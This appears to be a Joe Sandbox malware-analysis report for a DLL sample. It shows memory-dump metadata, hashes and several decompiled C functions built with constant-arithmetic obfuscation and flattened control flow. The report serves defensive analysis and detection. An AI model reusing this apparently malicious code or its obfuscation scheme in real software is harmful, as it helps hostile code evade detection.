                                                                                                                                                                            0x02f557aa
                                                                                                                                                                            0x02f557aa
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: \Lh
                                                                                                                                                                            • API String ID: 0-2235754405
                                                                                                                                                                            • Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
                                                                                                                                                                            • Instruction ID: 9ed80c8ca03d006549f6a9d9befc04a822eb3482b9dce0846fbbd9cfa3869fff
                                                                                                                                                                            • Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
                                                                                                                                                                            • Instruction Fuzzy Hash: 87419A72608346CFC768CE24D88482BBBE5FFD8348F104A1DFA9592260E775CA09CB46
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E02F5E640(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				void* _t78;
                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                            				void* _t82;
                                                                                                                                                                            				void* _t97;
                                                                                                                                                                            				signed int* _t100;
                                                                                                                                                                            
                                                                                                                                                                            				_t96 = _a8;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t68);
                                                                                                                                                                            				_v68 = 0x77f17d;
                                                                                                                                                                            				_t100 =  &(( &_v88)[4]);
                                                                                                                                                                            				_v68 = _v68 + 0xffffbc47;
                                                                                                                                                                            				_v68 = _v68 ^ 0x007a21f6;
                                                                                                                                                                            				_t97 = 0;
                                                                                                                                                                            				_v76 = 0xd01664;
                                                                                                                                                                            				_t82 = 0xf37e824;
                                                                                                                                                                            				_t79 = 0x2a;
                                                                                                                                                                            				_v76 = _v76 * 0x7b;
                                                                                                                                                                            				_v76 = _v76 + 0xc6ac;
                                                                                                                                                                            				_v76 = _v76 ^ 0x63f53bf0;
                                                                                                                                                                            				_v84 = 0xca0bb3;
                                                                                                                                                                            				_v84 = _v84 | 0xec4cd5b6;
                                                                                                                                                                            				_v84 = _v84 ^ 0xa5b6880a;
                                                                                                                                                                            				_v84 = _v84 + 0x809e;
                                                                                                                                                                            				_v84 = _v84 ^ 0x497d3a42;
                                                                                                                                                                            				_v72 = 0x505b1c;
                                                                                                                                                                            				_v72 = _v72 | 0xf2745011;
                                                                                                                                                                            				_v72 = _v72 ^ 0xf27af575;
                                                                                                                                                                            				_v88 = 0x8ba087;
                                                                                                                                                                            				_v88 = _v88 + 0x570e;
                                                                                                                                                                            				_v88 = _v88 + 0xffffc480;
                                                                                                                                                                            				_v88 = _v88 >> 5;
                                                                                                                                                                            				_v88 = _v88 ^ 0x00062f0c;
                                                                                                                                                                            				_v64 = 0x507489;
                                                                                                                                                                            				_v64 = _v64 + 0x50d6;
                                                                                                                                                                            				_v64 = _v64 ^ 0x0059b1d9;
                                                                                                                                                                            				_v80 = 0x3c915f;
                                                                                                                                                                            				_v80 = _v80 + 0xba86;
                                                                                                                                                                            				_v80 = _v80 / _t79;
                                                                                                                                                                            				_v80 = _v80 + 0x3cb0;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00080f7c;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t82 != 0x5422f69) {
                                                                                                                                                                            						if(_t82 == 0xc053a7e) {
                                                                                                                                                                            							__eflags = E02F69D3E( &_v60, _v64, __eflags, _v80, _t96 + 4);
                                                                                                                                                                            							_t97 =  !=  ? 1 : _t97;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t82 == 0xe18d46d) {
                                                                                                                                                                            								_t78 = E02F72BF0(_v84,  &_v60, _v72, _v88, _t96);
                                                                                                                                                                            								_t100 =  &(_t100[3]);
                                                                                                                                                                            								__eflags = _t78;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t82 = 0xc053a7e;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t82 != 0xf37e824) {
                                                                                                                                                                            									goto L9;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t82 = 0x5422f69;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L12:
                                                                                                                                                                            						return _t97;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F522A6(_a4, _v68,  &_v60, _v76);
                                                                                                                                                                            					_t100 =  &(_t100[2]);
                                                                                                                                                                            					_t82 = 0xe18d46d;
                                                                                                                                                                            					L9:
                                                                                                                                                                            					__eflags = _t82 - 0xc897eb;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L12;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x02f5e647
                                                                                                                                                                            0x02f5e64b
                                                                                                                                                                            0x02f5e64c
                                                                                                                                                                            0x02f5e650
                                                                                                                                                                            0x02f5e651
                                                                                                                                                                            0x02f5e652
                                                                                                                                                                            0x02f5e657
                                                                                                                                                                            0x02f5e65f
                                                                                                                                                                            0x02f5e662
                                                                                                                                                                            0x02f5e66c
                                                                                                                                                                            0x02f5e674
                                                                                                                                                                            0x02f5e676
                                                                                                                                                                            0x02f5e67e
                                                                                                                                                                            0x02f5e68f
                                                                                                                                                                            0x02f5e690
                                                                                                                                                                            0x02f5e694
                                                                                                                                                                            0x02f5e69c
                                                                                                                                                                            0x02f5e6a4
                                                                                                                                                                            0x02f5e6ac
                                                                                                                                                                            0x02f5e6b4
                                                                                                                                                                            0x02f5e6bc
                                                                                                                                                                            0x02f5e6c4
                                                                                                                                                                            0x02f5e6cc
                                                                                                                                                                            0x02f5e6d4
                                                                                                                                                                            0x02f5e6dc
                                                                                                                                                                            0x02f5e6e4
                                                                                                                                                                            0x02f5e6ec
                                                                                                                                                                            0x02f5e6f4
                                                                                                                                                                            0x02f5e6fc
                                                                                                                                                                            0x02f5e701
                                                                                                                                                                            0x02f5e709
                                                                                                                                                                            0x02f5e711
                                                                                                                                                                            0x02f5e719
                                                                                                                                                                            0x02f5e721
                                                                                                                                                                            0x02f5e729
                                                                                                                                                                            0x02f5e73c
                                                                                                                                                                            0x02f5e740
                                                                                                                                                                            0x02f5e748
                                                                                                                                                                            0x02f5e750
                                                                                                                                                                            0x02f5e750
                                                                                                                                                                            0x02f5e756
                                                                                                                                                                            0x02f5e7cf
                                                                                                                                                                            0x02f5e7d1
                                                                                                                                                                            0x02f5e758
                                                                                                                                                                            0x02f5e75e
                                                                                                                                                                            0x02f5e77d
                                                                                                                                                                            0x02f5e782
                                                                                                                                                                            0x02f5e785
                                                                                                                                                                            0x02f5e787
                                                                                                                                                                            0x02f5e789
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e789
                                                                                                                                                                            0x02f5e760
                                                                                                                                                                            0x02f5e766
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e768
                                                                                                                                                                            0x02f5e768
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e768
                                                                                                                                                                            0x02f5e766
                                                                                                                                                                            0x02f5e75e
                                                                                                                                                                            0x02f5e7d5
                                                                                                                                                                            0x02f5e7dd
                                                                                                                                                                            0x02f5e7dd
                                                                                                                                                                            0x02f5e79e
                                                                                                                                                                            0x02f5e7a3
                                                                                                                                                                            0x02f5e7a6
                                                                                                                                                                            0x02f5e7ab
                                                                                                                                                                            0x02f5e7ab
                                                                                                                                                                            0x02f5e7ab
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: B:}I
                                                                                                                                                                            • API String ID: 0-2889142627
                                                                                                                                                                            • Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
                                                                                                                                                                            • Instruction ID: 6361eb5a43f04ce0bf37e7daf1f37cac7b2f368558206438fd382b46d3fd911c
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
                                                                                                                                                                            • Instruction Fuzzy Hash: A641BD71508346DBD758CF20E98582FBBE5FBC4798F000A1EFB9192160D7758A098F93
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E02F60ABA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				unsigned int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				char _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				void* _t98;
                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                            				signed int _t105;
                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x104);
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_v44 = 0x104;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(0x104);
                                                                                                                                                                            				_v56 = 0x2049f9;
                                                                                                                                                                            				_t116 = 0;
                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                            				_v48 = 0;
                                                                                                                                                                            				_v20 = 0xeb153a;
                                                                                                                                                                            				_v20 = _v20 | 0xe521a998;
                                                                                                                                                                            				_v20 = _v20 >> 0xe;
                                                                                                                                                                            				_v20 = _v20 ^ 0x000387ae;
                                                                                                                                                                            				_v32 = 0xc4823f;
                                                                                                                                                                            				_v32 = _v32 + 0xd346;
                                                                                                                                                                            				_v32 = _v32 ^ 0x00c87855;
                                                                                                                                                                            				_v28 = 0x319d41;
                                                                                                                                                                            				_v28 = _v28 >> 0x10;
                                                                                                                                                                            				_v28 = _v28 ^ 0x000ba15b;
                                                                                                                                                                            				_v16 = 0x4743d7;
                                                                                                                                                                            				_t104 = 0x54;
                                                                                                                                                                            				_v16 = _v16 / _t104;
                                                                                                                                                                            				_v16 = _v16 ^ 0xf604c8f9;
                                                                                                                                                                            				_v16 = _v16 ^ 0xf6068564;
                                                                                                                                                                            				_v24 = 0x18550b;
                                                                                                                                                                            				_v24 = _v24 ^ 0x1069247b;
                                                                                                                                                                            				_t105 = 5;
                                                                                                                                                                            				_v24 = _v24 / _t105;
                                                                                                                                                                            				_v24 = _v24 ^ 0x03437d28;
                                                                                                                                                                            				_v36 = 0xafe78e;
                                                                                                                                                                            				_v36 = _v36 << 8;
                                                                                                                                                                            				_v36 = _v36 ^ 0xafe5259b;
                                                                                                                                                                            				_v8 = 0xc66a38;
                                                                                                                                                                            				_v8 = _v8 ^ 0x50a68901;
                                                                                                                                                                            				_v8 = _v8 ^ 0x40045619;
                                                                                                                                                                            				_v8 = _v8 * 0x15;
                                                                                                                                                                            				_v8 = _v8 ^ 0x584c57e2;
                                                                                                                                                                            				_v12 = 0xdb79dc;
                                                                                                                                                                            				_v12 = _v12 << 0xa;
                                                                                                                                                                            				_v12 = _v12 << 3;
                                                                                                                                                                            				_v12 = _v12 ^ 0x1655447b;
                                                                                                                                                                            				_v12 = _v12 ^ 0x796b06cf;
                                                                                                                                                                            				_v40 = 0x1393c;
                                                                                                                                                                            				_v40 = _v40 + 0x9e03;
                                                                                                                                                                            				_v40 = _v40 ^ 0x000e16cd;
                                                                                                                                                                            				_t98 = E02F6F790(_t105, _a12, _v20);
                                                                                                                                                                            				_t115 = _t98;
                                                                                                                                                                            				if(_t98 != 0) {
                                                                                                                                                                            					_t116 = E02F5DAAA(_t115, _v24, _v36, _a8, _v8, _t105,  &_v44);
                                                                                                                                                                            					E02F71538(_v12, _v40, _t115);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t116;
                                                                                                                                                                            			}




















                                                                                                                                                                            0x02f60ac7
                                                                                                                                                                            0x02f60ac8
                                                                                                                                                                            0x02f60acb
                                                                                                                                                                            0x02f60ace
                                                                                                                                                                            0x02f60ad1
                                                                                                                                                                            0x02f60ad4
                                                                                                                                                                            0x02f60ad7
                                                                                                                                                                            0x02f60ad8
                                                                                                                                                                            0x02f60ad9
                                                                                                                                                                            0x02f60ade
                                                                                                                                                                            0x02f60ae5
                                                                                                                                                                            0x02f60ae7
                                                                                                                                                                            0x02f60aec
                                                                                                                                                                            0x02f60aef
                                                                                                                                                                            0x02f60af6
                                                                                                                                                                            0x02f60afd
                                                                                                                                                                            0x02f60b01
                                                                                                                                                                            0x02f60b08
                                                                                                                                                                            0x02f60b0f
                                                                                                                                                                            0x02f60b16
                                                                                                                                                                            0x02f60b1d
                                                                                                                                                                            0x02f60b24
                                                                                                                                                                            0x02f60b28
                                                                                                                                                                            0x02f60b2f
                                                                                                                                                                            0x02f60b3b
                                                                                                                                                                            0x02f60b40
                                                                                                                                                                            0x02f60b45
                                                                                                                                                                            0x02f60b4c
                                                                                                                                                                            0x02f60b53
                                                                                                                                                                            0x02f60b5a
                                                                                                                                                                            0x02f60b64
                                                                                                                                                                            0x02f60b6a
                                                                                                                                                                            0x02f60b6d
                                                                                                                                                                            0x02f60b74
                                                                                                                                                                            0x02f60b7b
                                                                                                                                                                            0x02f60b7f
                                                                                                                                                                            0x02f60b86
                                                                                                                                                                            0x02f60b8d
                                                                                                                                                                            0x02f60b94
                                                                                                                                                                            0x02f60b9f
                                                                                                                                                                            0x02f60ba2
                                                                                                                                                                            0x02f60ba9
                                                                                                                                                                            0x02f60bb0
                                                                                                                                                                            0x02f60bb4
                                                                                                                                                                            0x02f60bb8
                                                                                                                                                                            0x02f60bbf
                                                                                                                                                                            0x02f60bc6
                                                                                                                                                                            0x02f60bcd
                                                                                                                                                                            0x02f60bd4
                                                                                                                                                                            0x02f60beb
                                                                                                                                                                            0x02f60bf0
                                                                                                                                                                            0x02f60bf7
                                                                                                                                                                            0x02f60c14
                                                                                                                                                                            0x02f60c1a
                                                                                                                                                                            0x02f60c1f
                                                                                                                                                                            0x02f60c29

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: WLX
                                                                                                                                                                            • API String ID: 0-2077286540
                                                                                                                                                                            • Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
                                                                                                                                                                            • Instruction ID: 536730ef60c91d7309b1e4597e0548e98c59fb5df251f267801ed8a4b6774d3a
                                                                                                                                                                            • Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
                                                                                                                                                                            • Instruction Fuzzy Hash: 4241E1B1D0120DEBCF09DFA5D94A8EEBBB6FB48314F208149E916B7210D3B54A558F90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F6FBDE() {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                            				void* _t99;
                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                            				void* _t111;
                                                                                                                                                                            
                                                                                                                                                                            				_v44 = _v44 & 0x00000000;
                                                                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                                                                            				_v48 = 0xd22319;
                                                                                                                                                                            				_v20 = 0x8c11a4;
                                                                                                                                                                            				_v20 = _v20 ^ 0x18a8aba7;
                                                                                                                                                                            				_t108 = 0xa;
                                                                                                                                                                            				_v20 = _v20 / _t108;
                                                                                                                                                                            				_v20 = _v20 ^ 0x026f5dce;
                                                                                                                                                                            				_v16 = 0xc2c77c;
                                                                                                                                                                            				_t99 = 0xb09cdbf;
                                                                                                                                                                            				_v16 = _v16 | 0x0f3eeb6c;
                                                                                                                                                                            				_t109 = 0x25;
                                                                                                                                                                            				_v16 = _v16 / _t109;
                                                                                                                                                                            				_v16 = _v16 * 0x35;
                                                                                                                                                                            				_v16 = _v16 ^ 0x16ecca7d;
                                                                                                                                                                            				_v12 = 0x9a8850;
                                                                                                                                                                            				_v12 = _v12 * 0x3d;
                                                                                                                                                                            				_v12 = _v12 + 0xffff2448;
                                                                                                                                                                            				_v12 = _v12 + 0xffff902b;
                                                                                                                                                                            				_v12 = _v12 ^ 0x24dbb777;
                                                                                                                                                                            				_v8 = 0xd2df60;
                                                                                                                                                                            				_v8 = _v8 + 0xffff203f;
                                                                                                                                                                            				_v8 = _v8 | 0xa0e0e7e8;
                                                                                                                                                                            				_v8 = _v8 << 6;
                                                                                                                                                                            				_v8 = _v8 ^ 0x3c71d6f5;
                                                                                                                                                                            				_v32 = 0x56890f;
                                                                                                                                                                            				_v32 = _v32 << 0xa;
                                                                                                                                                                            				_v32 = _v32 + 0x42ee;
                                                                                                                                                                            				_v32 = _v32 ^ 0x5a20a45b;
                                                                                                                                                                            				_v28 = 0x745af2;
                                                                                                                                                                            				_v28 = _v28 + 0x7057;
                                                                                                                                                                            				_v28 = _v28 * 0x1d;
                                                                                                                                                                            				_v28 = _v28 ^ 0x0d34271a;
                                                                                                                                                                            				_v36 = 0xe2682;
                                                                                                                                                                            				_v36 = _v36 >> 3;
                                                                                                                                                                            				_v36 = _v36 ^ 0x000bc26f;
                                                                                                                                                                            				_v24 = 0x784a24;
                                                                                                                                                                            				_v24 = _v24 + 0x8efc;
                                                                                                                                                                            				_v24 = _v24 >> 6;
                                                                                                                                                                            				_v24 = _v24 ^ 0x000a24d7;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t99 != 0x4881f76) {
                                                                                                                                                                            						if(_t99 == 0xb09cdbf) {
                                                                                                                                                                            							_push(_t99);
                                                                                                                                                                            							_push(_t99);
                                                                                                                                                                            							_t97 = E02F5C5D8(0x124);
                                                                                                                                                                            							_t111 = _t111 + 0xc;
                                                                                                                                                                            							 *0x2f7621c = _t97;
                                                                                                                                                                            							_t99 = 0x4881f76;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t100 =  *0x2f7621c; // 0x0
                                                                                                                                                                            					E02F69DF5(_t100 + 4, _v32, _v28, _v36, _v24);
                                                                                                                                                                            					_t111 = _t111 + 0xc;
                                                                                                                                                                            					_t99 = 0x6dda74a;
                                                                                                                                                                            					L5:
                                                                                                                                                                            				} while (_t99 != 0x6dda74a);
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}




















                                                                                                                                                                            0x02f6fbe4
                                                                                                                                                                            0x02f6fbea
                                                                                                                                                                            0x02f6fbee
                                                                                                                                                                            0x02f6fbf5
                                                                                                                                                                            0x02f6fbfc
                                                                                                                                                                            0x02f6fc0b
                                                                                                                                                                            0x02f6fc10
                                                                                                                                                                            0x02f6fc15
                                                                                                                                                                            0x02f6fc21
                                                                                                                                                                            0x02f6fc28
                                                                                                                                                                            0x02f6fc2a
                                                                                                                                                                            0x02f6fc39
                                                                                                                                                                            0x02f6fc41
                                                                                                                                                                            0x02f6fc48
                                                                                                                                                                            0x02f6fc4b
                                                                                                                                                                            0x02f6fc52
                                                                                                                                                                            0x02f6fc5d
                                                                                                                                                                            0x02f6fc60
                                                                                                                                                                            0x02f6fc67
                                                                                                                                                                            0x02f6fc6e
                                                                                                                                                                            0x02f6fc75
                                                                                                                                                                            0x02f6fc7c
                                                                                                                                                                            0x02f6fc83
                                                                                                                                                                            0x02f6fc8a
                                                                                                                                                                            0x02f6fc8e
                                                                                                                                                                            0x02f6fc95
                                                                                                                                                                            0x02f6fc9c
                                                                                                                                                                            0x02f6fca0
                                                                                                                                                                            0x02f6fca7
                                                                                                                                                                            0x02f6fcae
                                                                                                                                                                            0x02f6fcb5
                                                                                                                                                                            0x02f6fcc0
                                                                                                                                                                            0x02f6fcc3
                                                                                                                                                                            0x02f6fcca
                                                                                                                                                                            0x02f6fcd1
                                                                                                                                                                            0x02f6fcd5
                                                                                                                                                                            0x02f6fcdc
                                                                                                                                                                            0x02f6fce3
                                                                                                                                                                            0x02f6fcea
                                                                                                                                                                            0x02f6fcee
                                                                                                                                                                            0x02f6fcf5
                                                                                                                                                                            0x02f6fcf5
                                                                                                                                                                            0x02f6fcfb
                                                                                                                                                                            0x02f6fd09
                                                                                                                                                                            0x02f6fd0a
                                                                                                                                                                            0x02f6fd10
                                                                                                                                                                            0x02f6fd15
                                                                                                                                                                            0x02f6fd18
                                                                                                                                                                            0x02f6fd1d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6fd1d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6fcfb
                                                                                                                                                                            0x02f6fd2a
                                                                                                                                                                            0x02f6fd36
                                                                                                                                                                            0x02f6fd3b
                                                                                                                                                                            0x02f6fd3e
                                                                                                                                                                            0x02f6fd40
                                                                                                                                                                            0x02f6fd40
                                                                                                                                                                            0x02f6fd4d

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Jx
                                                                                                                                                                            • API String ID: 0-2488101295
                                                                                                                                                                            • Opcode ID: fb4e5b8f5603264041c1ab330d94c5985103753121f65cfda1e3ed3790c0822d
                                                                                                                                                                            • Instruction ID: 1747c33483a2f0179bc5cd19218c290075253c995f04d556e9cbc483c47ab675
                                                                                                                                                                            • Opcode Fuzzy Hash: fb4e5b8f5603264041c1ab330d94c5985103753121f65cfda1e3ed3790c0822d
                                                                                                                                                                            • Instruction Fuzzy Hash: BB412471D0021AABDF08CFA5D98A5EEFBB1FB44358F208159D512B7250D7B81A49CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 34%
                                                                                                                                                                            			E02F57078(void* __ecx, void* __eflags) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                            				signed int _t113;
                                                                                                                                                                            				signed int _t114;
                                                                                                                                                                            				signed int _t115;
                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                            				signed int _t117;
                                                                                                                                                                            				signed int _t118;
                                                                                                                                                                            				void* _t132;
                                                                                                                                                                            				void* _t133;
                                                                                                                                                                            				signed int _t134;
                                                                                                                                                                            
                                                                                                                                                                            				_v12 = 0x8f98c8;
                                                                                                                                                                            				_v12 = _v12 >> 1;
                                                                                                                                                                            				_v12 = _v12 << 0x10;
                                                                                                                                                                            				_v12 = _v12 ^ 0x6b25fb67;
                                                                                                                                                                            				_v12 = _v12 ^ 0xa7412f1a;
                                                                                                                                                                            				_v8 = 0xcf53a8;
                                                                                                                                                                            				_v8 = _v8 + 0xffff4190;
                                                                                                                                                                            				_v8 = _v8 << 6;
                                                                                                                                                                            				_v8 = _v8 ^ 0xcc79c588;
                                                                                                                                                                            				_v8 = _v8 ^ 0xffd9b9f8;
                                                                                                                                                                            				_v32 = 0xdc21b3;
                                                                                                                                                                            				_t133 = __ecx;
                                                                                                                                                                            				_t113 = 0x53;
                                                                                                                                                                            				_v32 = _v32 / _t113;
                                                                                                                                                                            				_v32 = _v32 ^ 0x0002aeef;
                                                                                                                                                                            				_v20 = 0xa54b66;
                                                                                                                                                                            				_t114 = 0x25;
                                                                                                                                                                            				_v20 = _v20 / _t114;
                                                                                                                                                                            				_v20 = _v20 << 4;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00488e30;
                                                                                                                                                                            				_v28 = 0xf9718f;
                                                                                                                                                                            				_v28 = _v28 | 0xd1e9f83c;
                                                                                                                                                                            				_v28 = _v28 + 0xbce;
                                                                                                                                                                            				_v28 = _v28 ^ 0xd1f9aa01;
                                                                                                                                                                            				_v16 = 0x596927;
                                                                                                                                                                            				_t115 = 0x70;
                                                                                                                                                                            				_v16 = _v16 / _t115;
                                                                                                                                                                            				_t116 = 0x65;
                                                                                                                                                                            				_v16 = _v16 / _t116;
                                                                                                                                                                            				_t117 = 0x1e;
                                                                                                                                                                            				_v16 = _v16 / _t117;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0002780a;
                                                                                                                                                                            				_v24 = 0x48f141;
                                                                                                                                                                            				_v24 = _v24 << 0xe;
                                                                                                                                                                            				_v24 = _v24 >> 1;
                                                                                                                                                                            				_v24 = _v24 ^ 0x1e282004;
                                                                                                                                                                            				_v36 = 0x9232a3;
                                                                                                                                                                            				_t118 = 0x42;
                                                                                                                                                                            				_push(_t118);
                                                                                                                                                                            				_v36 = _v36 / _t118;
                                                                                                                                                                            				_v36 = _v36 ^ 0x00023701;
                                                                                                                                                                            				_push(_t118);
                                                                                                                                                                            				_t109 = E02F6CCA0(_v24, _v36);
                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                            				_t134 = _t109;
                                                                                                                                                                            				_push(_t134);
                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                            				_t132 = 3;
                                                                                                                                                                            				E02F5E404(_v28, _t132);
                                                                                                                                                                            				 *((short*)(_t133 + _t134 * 2)) = 0;
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}





















                                                                                                                                                                            0x02f5707e
                                                                                                                                                                            0x02f57087
                                                                                                                                                                            0x02f5708a
                                                                                                                                                                            0x02f5708e
                                                                                                                                                                            0x02f57095
                                                                                                                                                                            0x02f5709c
                                                                                                                                                                            0x02f570a3
                                                                                                                                                                            0x02f570aa
                                                                                                                                                                            0x02f570ae
                                                                                                                                                                            0x02f570b5
                                                                                                                                                                            0x02f570bc
                                                                                                                                                                            0x02f570ca
                                                                                                                                                                            0x02f570cc
                                                                                                                                                                            0x02f570d1
                                                                                                                                                                            0x02f570d6
